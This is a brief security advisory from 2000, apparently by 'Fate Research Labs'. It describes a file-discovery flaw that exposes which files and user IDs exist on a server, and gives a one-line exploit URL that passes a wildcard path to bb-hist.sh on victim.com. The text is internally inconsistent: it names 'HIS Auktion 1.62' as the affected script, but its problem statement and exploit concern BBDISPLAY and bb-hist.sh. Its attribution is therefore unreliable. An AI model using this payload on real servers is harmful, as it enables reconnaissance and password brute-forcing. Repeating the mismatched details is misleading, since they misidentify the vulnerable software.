Name   : File Discovery Vulnerability (11-20-2000)
About  : script "HIS Auktion 1.62" is a catalog of links CGI
         script. The creators site http://www.his-software.de
Problem: Vulnerabilities exists such that someone can identify
         if sensitive files exists and determine user ids on
         the BBDISPLAY server(s) and use those to launch a
         password brute-force attack.

Exploit:

 http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*

                                         Loki
                                         Fate Research Labs
                                         loki@f8labs.com